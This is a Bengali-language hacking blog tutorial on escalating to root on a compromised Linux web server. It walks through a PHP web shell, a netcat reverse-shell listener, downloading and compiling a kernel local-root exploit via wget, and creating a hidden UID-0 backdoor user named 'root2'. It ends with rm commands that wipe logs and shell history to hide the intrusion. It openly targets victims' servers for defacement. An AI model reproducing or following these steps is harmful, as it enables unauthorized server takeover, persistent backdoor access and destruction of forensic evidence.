আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।

.................................................................10%3∞ .........................................................

সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে  আপনার উইন্ডোজ পিসি  দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু  আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।

কাজের ধারা >>>>
যা যা লাগবে

> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT

Step 1 - Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।

এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল

2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি exploit-db, 1337day, th3-0utl4ws  এসব  সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 - Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না ...... গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার  netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit "Enter"
এই কাজ কিন্তু cmd তে করতে হবে

তাহলে এটি রিপ্লাই দেবে এরকম  "listening on [any] 443 ..."

এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি "BackConnect function" পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন

এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
 

Step 3 - Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি । এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits...8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক  টাইপ করুন  । তাহলে এটি সার্ভারে  "2.6.18-164.zip" নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।

আপনি যদি এক্সপ্লইট কে যে কোন  নাম যেমন anyrandomname.zip ডাউনলোড করেন তাহলে টাইপ করুন
unzip anyrandomname.zip

এখন আপনি আপনার এক্সপ্লইট পাবেন  (Like mine "2.6.18-164")
এখন সবগুল ধাপ সম্পন্ন করার পর ............................

Type:

chmod 777 yourexploit'sname
আমি যেখানে  your exploit লিখলাম   সেখানে আপনি নিজের টা লিখবেন

এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit'sname

To check if you got root type
id
or
whoami

Step 4 - Adding root user
মানে আসল অ্যাডমিন ছাড়া  অন্যদের  এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

কম্যান্ড এর ব্যাখা
Quote:adduser - এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 -  এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি  ইচ্ছা মত নাম দিতে পারেন

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)
একটি উদাহরণ দেখুন

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

আপনি ঠিকমত  করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন

id root2
(Root2 is your username)

 GNY shell - http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat -  এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/

Clearing Logs:

এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout

শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু > http://www.facebook.com/CY133R  এ
আর আমি > http://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
...............................................................10%3∞ ................................................